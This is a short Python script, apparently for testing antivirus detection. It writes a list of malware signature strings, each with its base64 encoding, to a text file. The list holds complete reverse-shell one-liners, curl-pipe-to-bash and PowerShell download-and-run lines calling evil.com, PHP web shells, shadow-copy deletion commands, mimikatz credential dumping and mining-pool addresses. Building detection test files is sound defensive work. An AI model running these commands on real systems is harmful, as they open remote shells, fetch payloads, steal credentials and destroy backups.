# Aceasta aplicatie genereaza un fisier care este detectat ca virus print pattern matching

import base64

patterns = [
    "<?php eval(base64_decode('aGVsbG8gd29ybGQ='));",
    "<?php assert(base64_decode('dGVzdCBwYXlsb2Fk'));",
    "eval(gzinflate(base64_decode('test')));",
    "eval(str_rot13('uryyb'));",
    "create_function('', 'eval(base64_decode(...))');",
    "eval(unescape('%74%65%73%74'));",
    "eval(atob('dGVzdA=='));",
    "eval(String.fromCharCode(116,101,115,116));",
    "document.write(unescape('%74%65%73%74'));",
    "setTimeout(\"eval(atob('dGVzdA=='))\", 0);",
    "powershell -enc dGVzdA==",
    "powershell -nop -w hidden -exec bypass -enc dGVzdA==",
    "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/shell.ps1')",
    "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://evil.com')",
    "Invoke-Mimikatz -DumpCreds",
    "[Convert]::FromBase64String('dGVzdA==')",
    "vssadmin delete shadows /all /quiet",
    "bcdedit /set recoveryenabled no",
    "wbadmin delete catalog -quiet",
    "shadowcopy delete",
    "YOUR_FILES_ARE_ENCRYPTED",
    "HOW_TO_DECRYPT_YOUR_FILES.txt",
    "README_DECRYPT.html",
    "CreateRemoteThread",
    "WriteProcessMemory",
    "VirtualAlloc",
    "VirtualAllocEx",
    "NtUnmapViewOfSection",
    "ZwUnmapViewOfSection",
    "QueueUserAPC",
    "RtlCreateUserThread",
    "/bin/bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",
    "nc -e /bin/sh 10.0.0.1 4444",
    "ncat -e /bin/bash 10.0.0.1 4444",
    "socat exec:bash tcp:10.0.0.1:4444",
    "python -c 'import socket,subprocess,os'",
    "perl -e 'use Socket'",
    "wget http://evil.com/shell -O /tmp/shell",
    "curl -o /tmp/backdoor http://evil.com/backdoor",
    "chmod +x /tmp/shell",
    "exec /tmp/shell",
    "curl http://evil.com/payload | bash",
    "stratum+tcp://pool.minexmr.com:4444",
    "stratum+ssl://xmr.pool.minergate.com:443",
    "xmrig --donate-level 1 -o pool.minexmr.com",
    "cryptonight",
    "nicehash",
    "<?php eval($_POST['cmd']); ?>",
    "<?php system($_GET['cmd']); ?>",
    "<?php passthru($_REQUEST['cmd']); ?>",
    "<?php shell_exec($_POST['c']); ?>",
    "<?php popen($_GET['cmd'], 'r'); ?>",
    "c99shell",
    "r57shell",
    "b374k",
    "mimikatz",
    "sekurlsa::logonpasswords",
    "lsass.exe dump",
    "/etc/shadow",
    "pass_the_hash",
    "golden_ticket",
    "DCSync",
    "kerberoast",
    "AppInit_DLLs",
    "schtasks /create /tn Updater /tr cmd.exe /sc onlogon",
    "sc create backdoor binpath= cmd.exe",
    "Winlogon\\Shell",
    "LaunchAgents",
    "LaunchDaemons",
    "LD_PRELOAD",
    "/etc/crontab",
    "/etc/rc.local",
    "IsDebuggerPresent",
    "CheckRemoteDebuggerPresent",
    "NtQueryInformationProcess",
    "anti_sandbox",
    "anti_vm",
    "regsvr32 /s /n /u",
    "mshta http://evil.com/payload.hta",
    "wmic process call create cmd.exe",
    "certutil -decode payload.b64 payload.exe",
    "rundll32 javascript",
    "cobalt strike",
    "meterpreter",
    "beacon sleep",
    "Auto_Open",
    "AutoExec",
    "Document_Open",
    "CreateObject(\"WScript.Shell\")",
    "CreateObject(\"Shell.Application\")",
    "heap_spray",
    "use_after_free",
    "EternalBlue",
    "MS17-010",
    "CVE-2017-0144",
]

lines = []
for p in patterns:
    encoded = base64.b64encode(p.encode()).decode()
    lines.append(p)
    lines.append(encoded)

with open("testmixed.txt", "w") as f:
    f.write("\n".join(lines))

print("Generated testmixed.txt")
print(f"Total lines: {len(lines)}")